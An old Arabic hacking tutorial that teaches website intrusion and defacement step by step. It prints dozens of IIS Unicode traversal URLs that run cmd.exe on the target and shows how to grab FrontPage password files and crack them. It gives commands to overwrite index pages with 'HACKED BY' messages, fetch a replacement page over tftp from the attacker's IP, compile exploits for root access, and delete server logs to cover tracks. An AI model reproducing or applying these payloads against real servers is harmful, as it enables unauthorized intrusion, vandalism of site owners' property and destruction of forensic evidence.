********************************************
كاتب الموضوع DJ KING جميع حقوق النشر ملك الكاتب
dj_king@hackermail.com
********************************************
تعلم الاختراق مع DJ KING
---------------------------------
يعتبر هذا الموضوع و الذي انت على وشك قرائته من اخطر المواضيع التي كتبها في حياتي و هي ايضا في رايي من اقوى المواضيع التي كتبت على الاطلاق
ليس لقدرة في ( حاشالله ) انما بسبب شمولية الموضوع و تعدد الافكار فيه
بعد قرائة هذا الموضوع ستتكون عندك فكره قويه جدا حول اختراق المواقع ... ليس بالضروره ان تخترق مواقع بعد قرائة هذا الموضوع انما ستفهم ما يحدث من حولك
و تفهم ايضا معظم اساليب الاختراق
اولا : معرفة نظام الموقع :
------------------------------
لابد من معرفة نظام الموقع حتى تحدد مسارك في خطوات الاختراق .. لذا فلابد من معرفة النظام و يمكن هذا عن طريق اشكال كثييره اذكر منها
اهم و ابسط طرق :
- عن طريق موقع netcraft الشهيير
- بعض البرامج المخصصه لذلك
- عن طريق محاولة الاتصال بالموقع من التلنت telnet
- و ممكن ايضا عن طريق عمل سكان على الموقع port scan و بعض البورتات المفتوحه تدل على انظمه معينه
اسهل هذه الطرق هي الاولى في رايي :
وصلة الموقع : http://www.netcraft.com/whats تضع اسم الموقع المراد فحصه ثم enter لتحصل على النتيجه
امثله :
The Site www.xxx.com is running Apache on Linux or running IISx on NT/windows9x/2000/Xp
و من هنا نلاحظ انه هناك نتيجتين ( على الاقل )
في المثال الاول :
Apache = Web Server ( الملقم باللغة العربيه )
Linux = Server's Os ( نظام الشتغيل )
في المثال الثاني :
IIS = Web Server
Windows/NT/2000/xp = Server's Os
هناك انظمه اخرى كثييره و ملقمات اخرى ايضا :
انظمه اخرى مثل : SunOS , FreeBSD (My BaBe) , OpenBSD , NetBSD , AIX , IRIX
ملقمات اخرى مثل : NetScape Enterprise
كما يمكن ايضا من موقع Netcraft.com معرفة بعض الخدمات على السيرفر مثل نسخة ال PHP و FrontPage الخ ....
و الان و بعد ان توصلنا الي نتائج معينه نريد ان نباشر العمل ...
و ساوضح ميفية التفكير و خطوات الاختراق في حالتي الويندوز و اللينكس باذن الله
ماذا لو اكتشفت ان الموقع يعمل على نظام ويندوز Windows NT/9x/2000/xp ؟
-------------------------------------------------------------------------------------------------
اذا لابد من التفكيير في الاختراق من عدة امور :
1. IIS Unicodes و هي كثيييره جدا و متنوعه على جميع اصدارات ال IIS
2. FTP Server و هي ثغرات ال FTP
3.Sharing Files المشاركه بالملفات
4.FrontPage
نبدا من الاسهل تحققا فالاصعب :
FTP ... بما ان معظم قرائ هذا الموضوع من مستخدمين الويندوز فمعظم كلامي سيكون حول الويندوز في تنفيذ العمليات
اذهب الى start>run> ftp -n hostname
و من ثم ستفتح الدوس و تعمل كونكت Connection مع السيرفر و يقولك عن نسخة ال FTP server الموجوده على السيرفر
بنمتهى البساطه ممكن التاكد من هذه النسخه فيها ثغرات دون استخدام اي برامج من محركات البحث الشهيره مثل :
packetstrom , securityfocus , google.com الخ ..
Sharing Folders :
عن طريق ال NetBios ==> Port 139 و هذا يمكن الكشف عنه عن طريق Port Scanner على البورت رقم 139 اي برنامج سيوفي الغرض مثل SuperScan الخ
و بعدها تحاول تعمل كونكت مع السيرفر عن طريق start>run>\\ip address ممكنا تكون فيه كلمة سر و ممكن لا ( خليها على الله )
الفرونت بيج FrontPage
-----------------------------
هناك ثغرات كثييره يمكن استغلالها منه اذكر منها اشهر الثغرات :
http://www.xxx.com/_vti_pvt/service.pw
و منها نحصل على كلمة المرور و كلمة السر
كلمة السر مشفره بمقياس DES و الذي يمكن كسره ببرامج كثييره اشهرها John The Ripper و الذي يعمل في بيئتي الويندوز و ال *nix
اخييرا و ليس اخرا IIS
--------------------------
IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز Unicodes
و هي كثيييييييييييييييييره جدا و انا اعني ما اقول :)
مثل :
****
http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
و ثغرات اخى كثييييييييييييييييييييييره جدا ما كتبه لا يساوي 1.0% منها
و سابدا حالا طريقه استغلال هذه الثغرات بكذى طريقه
- يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال cmd.exe اتنفيذ اوامرنا
مثال للثغره و تطبيق الاوامر :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
امر انشاء دليل جديد :
-------------------------
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\DJ
امر الغاء دليل:
----------------
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+c:\DJ
الامر المستخدم للنسخ:
-----------------------------
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\DJ.exe
الامر المستخدم للحذف
-----------------------------
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\inetpub\wwwroot\index.asp
الامر المستخدم لتغيير مسمى الملف :
-------------------------------------------------
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+c:\DJ.htm+DJKING.htm
لامر المستخدم لرؤية محتويات الملف
___________________________
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:\index.htm
الامر المستخدم للكتابة داخل أي ملف:
------------------------------------------------
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+c:\DJ.txt
ملحوظه :
------------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون : msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
و الان لتغيير الصفحه الاولى للومقع لابد من :
- الكتابه على الصفحه الرئيسيه مستخدمين الامر echo
- برفع صفحتك الشخصيه بواسطة برنامج ال TFTP
طريقة الكتابه على الملف الرئيسي للموقع index.htm باستخدام الامر echo :
-----------------------------------------------------------------------------------------------
مبدئيا لابد من نسخ ملف cmd.exe الي مجلد scripts بهذا الشكل على سبيل المثال :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\DJ.exe
و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده :
http://www.xxx.com/scripts/DJ.exe/c+dir+c:\
و بعدها يمكن تنفيذ الامر echo بالشكل التالي :
http://www.xxx.com/scripts/CMD1.exe?/c+echo+HACKED+BY+EL+BATAR++abcd_110@hotmail.com+_+Long+Live+Palestine+>+E:\Lymphasite\2.htm
* ملحوظات هامه:
---------------------
- ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها index.htm فممكن ان تكون :
index.html , default.html , default.htm , default.asp فعليك التاكد اولا من اسم الملف و لكن index.htm هو الافتراضي ان يكون الرئيسي
- ممكن ان يكون الملف الرئيسي في مجلد غير ال wwwroot لذا فلابد من البحث ...
طريقة استخدام رفع الصفحه بواسطة برنامج TFTP :
------------------------------------------------------------------
سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى
- حمل برنامج ال tftp فهو صغير و مجاني
- ضعه في ال c:\
- ضع الاندكس او صفحتك المراد رفعها في ايضا ال c:\
- شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:\inetpub\wwwroot\index.htm
حيث :
-------
tftp.exe هو البرنامج المستخدم للرفع
"i-" براميتر
y.y.y.y رقم الايبي الخاص بك
و الباقي على ما اظن لا يحتاج توضيح .. C:\inetpub\wwwroot\index.htm هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا
و اخيرا لمسح اللوق :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log
هذا تقريبا كل ما يخص سيرفرات الويندوز و ال IIS
اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux
فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال ftp server
فمعظم نسخ ال ftp لها ثغرات يمكن استغلالها
ملحوظه :
-----------
عند اختراق مثل هذه المواقع لابد من استخدام *nix اذا كان على جهازك او من Unix Shell و انت متصل من الويندوز هذا حسب ايمكانياتك المتاحه
بالنسبه لليونكس شيل لاتحاول ابدا استخدام شيلات مجانيه فلن تفلح و سيتم الغاء اشتراكك
بعد ما توصلت لموقع معين ووجدث ثغره معينه طريقة تطبيقها يكون بالطريقه هذه ( في حالة ان exploite هي source code )
الملف سيكون exploit.c فتطبيقها عادة ما يكون بهذا الشكل :
gcc -o exploit exploite.c
و من ثم exploit victim/. حيث ال victim رقم الايبي او الهوست نيم مثل : www.xxx.com
و بدها يمكن الحصول على root
نفذ الامر pwd للتاكد من مكانك على السيرفر و من ثم قم بعمل الامر cd / to make sure u go to the root place
للذين يحبون توخذ الحذر قبل تغيير الصفحه الرئيسيه .. قومو باستخدام الامر who لمعرفة من معك حاليا على السيرفر
اذا كنت لوحدك باشر عملك علطول و ابحث عن ال index.html يمكن ذلك عن طريق الامر :
find / -name index.html
هذا سيقوم بالبحث في كل السيرفر عن اسم هذا الملف و بعد الحصول على الملف المراد و غالبا ما يكون في ادى هذه المجلدات : htdocs, httpd, htroot, webdocs, and www
اما ان تحمل الاندكس الخاصه بك من اي مكان عن طريق ftp او تستخدم طريقتي المفضله و هي :
cat or pico index.html حيث ان ال cat or pico هما text editors و من ثم قم بمسح كود ال html بتاع الصفحه و الصق كود ال html بتاع صفحتك انت و اعمل save اخرج
و بالشفا كده الطبخه استوت lol
او انك تستخد الامر echo و هو في منتهى السهول بهذا الشكل : echo "whatever" >file مثال : echo "HACKED BY DJ KING" >index.html
و انتهى الموضوع :)
لمسح اللوق دور على كل فيلات اللوق باستخدام هذه الاوامر :
find / -name log
find / -name logs
find / -name logfiles
find / -name klogd
find / -name syslogd
و من ثم امسحهم بالامر rm -rf /folder/log
عملية الاختراق ليست صعبه كما يظن البعض انما تحتاج لاسلوب صحيح في التفكير .. و تحتاج لمتابعة احدث الثغرات و كيفية الحصول عليها
مواقع بها ارشيف ثغرات :
hack.co.za
packetstorm.securify.com
securityfocus.com
و مواقع اخرى كثييره لكن هذه اشهرهم ... ارجو ان اكون وفقت في هذا الشرح الاعلى نسبيا من المبسط ..
ملحوظه هامه جدا :
------------------------
جميع حقوق النشر ملك الكاتب DJ KING
dj_king@hacerkmail.com
ارجو ان يتم نشر هذا الموضوع و توزيعه في كل مكان حتى تعم الفائده على كل اخواننا العرب لكن مع حفظ النشر تحت اسم الكاتب
اخوكم : DJ KING
و اخيرا جميع استفسارتكم مرحب بها
U HAVE SEEN NOTHING YET .. GET READY